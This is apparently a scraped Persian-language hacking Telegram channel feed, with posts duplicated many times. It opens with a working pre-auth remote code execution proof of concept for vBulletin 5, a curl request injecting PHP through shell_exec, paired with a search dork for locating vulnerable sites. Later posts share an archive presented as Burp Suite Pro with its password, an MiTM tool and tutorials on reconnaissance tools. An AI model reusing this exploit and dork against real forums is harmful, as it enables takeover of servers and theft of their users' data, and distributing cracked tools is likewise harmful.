A new pre-auth 0day RCE exploit for vBulletin 5:
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
POC: curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
POC: curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
A new pre-auth 0day RCE exploit for vBulletin 5: https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/ POC: curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config…
0day RCE exploit on vBulletin 5xx
dork ; intext:"Powered by vBulletin"
POC : curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
dork ; intext:"Powered by vBulletin"
POC : curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش ابزار Maltego در کالی لینوکس
ابزار Maltego یک ابزار در زمینه جمع آوری اطلاعات هستش که جز 10 ابزار برتر کالی لینوکس هست .
#kali #linux #maltego #Information_Gathering
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
ابزار Maltego یک ابزار در زمینه جمع آوری اطلاعات هستش که جز 10 ابزار برتر کالی لینوکس هست .
#kali #linux #maltego #Information_Gathering
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
0day RCE exploit on vBulletin 5xx dork ; intext:"Powered by vBulletin" POC : curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;' iliyahr ——————…
ابزار قدرتمند Ghidra توسعه یافته توسط موسسه امنیتی NSA جهت آنالیز Malware ها
Site
#reverseengineering #tools
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
Site
#reverseengineering #tools
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
امشب گزارشی از NSA و FBI منتشر شد که از بدافزاری روسی پردهبرداری میکرد که برروی سیستمها و سرورهای مبتنی بر لینوکس عمل میکنه و خودش رو تکثیر میده. این گزارش دست کم برای سازمانها و شرکتهای ایرانی هم مفیده چون روسیه فقط امریکا رو تهدید نمیکنه.
File
منبع : آفسک
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
File
منبع : آفسک
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
🔴 پیام رسان محبوب تلگرام 7 ساله شد؛ تماس تصویری در راه است
ساعاتی پیش موسس و مدیر تلگرام، آقای پاول دورف با انتشار پستی در شبکه اجتماعی توییتر از تولد هفت سالگی این پیام رسان خبر داد و اعلام کرد که در روز آینده قابلیت تماس تصویری تلگرام به صورت عمومی عرضه خواهد شد.
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
ساعاتی پیش موسس و مدیر تلگرام، آقای پاول دورف با انتشار پستی در شبکه اجتماعی توییتر از تولد هفت سالگی این پیام رسان خبر داد و اعلام کرد که در روز آینده قابلیت تماس تصویری تلگرام به صورت عمومی عرضه خواهد شد.
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش آسیب پذیری File Upload در Dvwa
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
* در این آموزش از Burp Suite هم استفاده شده است *
#windows #dvwa #File_Uploadiliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
burpsuite_pro_2020.7.zip
350.4 MB
Burp Suite Version 2020.7
آموزش استفاده در فایل Readme گفته شده .
pass: 311138
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش استفاده در فایل Readme گفته شده .
* نکته برای اجرا شدن نیاز به Java runtime ورژن 9 به بالا و Java JDK نیاز خواهید داشت . *
#burpsuite pass: 311138
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
اینترنت ماهوارهای استارلینک که از آن به نام «اینترنت آزاد» نام برده میشود، عملیاتی و نتیجه تست سرعت آن منتشر شد.
شنیده شده که این سرویس برای ایران هم ارائه خواهد شد. با اضافه شدن ماهوارههای بیشتری در هفتههای آتی، سرعت اینترنت بر روی این شبکه به ۶۰۰مگابیت هم خواهد رسید.
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
شنیده شده که این سرویس برای ایران هم ارائه خواهد شد. با اضافه شدن ماهوارههای بیشتری در هفتههای آتی، سرعت اینترنت بر روی این شبکه به ۶۰۰مگابیت هم خواهد رسید.
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش نصب BeEF بر روی کالی لینوکس
Git
#kali #linux #beef
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
Git
#kali #linux #beef
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
This media is not supported in your browser
VIEW IN TELEGRAM
ابزار الهام گرفته شده از BeEF برای اجرای حملات MiTM در وبسایت ها
Git
#Beef #Mitm
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
Git
#Beef #Mitm
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
This media is not supported in your browser
VIEW IN TELEGRAM
جاوا اسکریپت همون کوچیک شده جاواس ??%@!! Wtf ??#!
ایشون چند وقتیه اینستارو پر کرده که آره من تو یک ماه بهتون آموزش برنامه نویسی میدم و این سطح علمیشونه !!!!!
همونطور که زبان ویندوز html هست ، جاوا اسکریپت هم کوچیک شده جاوا هستش 😂😂
#Fun
——————
@LearnExploit
ایشون چند وقتیه اینستارو پر کرده که آره من تو یک ماه بهتون آموزش برنامه نویسی میدم و این سطح علمیشونه !!!!!
همونطور که زبان ویندوز html هست ، جاوا اسکریپت هم کوچیک شده جاوا هستش 😂😂
#Fun
——————
@LearnExploit
آموزش ابزار DMitry برای جمع آوری اطلاعات در کالی لینوکس
#DMitry #kali #linux #Information_Gathering
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#DMitry #kali #linux #Information_Gathering
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army